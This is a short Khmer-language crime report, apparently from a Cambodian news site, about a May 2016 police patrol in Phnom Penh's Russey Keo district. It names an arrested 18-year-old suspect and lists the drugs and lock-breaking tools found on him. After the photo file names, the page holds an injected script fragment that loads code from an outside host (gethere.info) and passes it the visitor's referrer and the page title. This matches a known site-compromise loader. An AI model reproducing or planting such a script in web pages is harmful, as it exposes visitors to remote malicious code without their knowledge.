ព្រឹតិ្តការណ៍ថ្មីៗ

ម្នាក់រួចខ្លួនម្នាក់ជាប់ខ្នោះវាយមកសាកសួរនៅប៉ុស្តិ៍​ឬស្សីកែវ

2 ឆ្នាំ មុន 1 tnn_admin

 

ភ្នំពេញ៖ ជនង្ស័យម្នាក់ត្រូវបានរួចខ្លួន តែម្នាក់ជាប់ខ្នោះ ខណ:កម្លាំងល្បាតខណ្ឌ និងប៉ុស្តិ៍ចេញត្រួតពិនិត្យក្នុងមូលដ្ឋាន នៅវេលាម៉ោង៤និង៣០នាទីព្រឹក ថ្ងៃទី២២ ខែឧសភា ឆ្នាំ២០១៦នេះ ក្នុងមូលដ្ឋានសង្កាត់ឬស្សីកែវ។

មេប៉ុស្តិ៍ឬស្សីកែវ លោក តូច គឹមសុង បានអោយដឹងផងដែរថា ខណ:ដែលសមត្ថកិច្ចកំពុងល្បាតតាមគោលដៅកម្លាំងល្បាតសហប៉ុស្តិ៍បានធ្វើការឃើញមុខសញ្ញាចំនួន០២នាក់ ដោយគ្រាន់តែឃើញសមត្ថកិច្ចភ្លាមបុរសម្នាក់បានរត់គេចខ្លួនភ្លែត តែម្នាក់ទៀតត្រូវបានឃាត់ខ្លួនបានម្នាក់ឈ្មោះ ចាន់ ឡុង ហៅអាឡុង ភេទប្រុស អាយុ១៨ឆ្នាំ ជនជាតិវៀតណាម មុខរបរកម្មករសំណង់ មានទីលំនៅផ្ទះជួល ភូមិសាមគ្គី សង្កាត់ឬស្សីកែវ ខណ្ឌឬស្សីកែវ។

នាយប៉ុស្តិ៍នគរបាលរូបនេះបានអោយដឹងបន្តទៀតថា
នៅពេល សមត្ថកិច្ចបានធ្វើការត្រួតពិនិត្យនៅលើដងខ្លួនជនសង្ស័យ បានរកឃើញថ្នាំញៀនប្រភេទម្សៅក្រាមពណ៍សថ្លា មួយកញ្ចប់ធំ ថ្នាំគ្រាប់មួយគ្រាប់ប្រភេទថ្នាំគ្រវីនិងកាបូបស្ពាយមួយនៅក្នុងនោះមានសោរសំរាប់កាច់សោករម៉ូតូពីរសំរាប់ ដែកទូរឺវុីសពីរផងដែរ។

បច្ចុប្បន្នជនសង្ស័យកំពុងឃុំខ្លួនជាបណ្តោះអាសន្ននៅអធិកាដ្ឋាននគរបាលខណ្ឌឬស្សីកែវ ដើម្បីសាកសួបន្ថែម និងកសាងសំណុំរឿងចាត់ការទៅតាមផ្លូវច្បាប់។

IMG-20160522-WA0060IMG-20160522-WA0062 IMG-20160522-WA0061 IMG-20160522-WA0059 IMG-20160522-WA0021-1IMG-20160522-WA0020s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់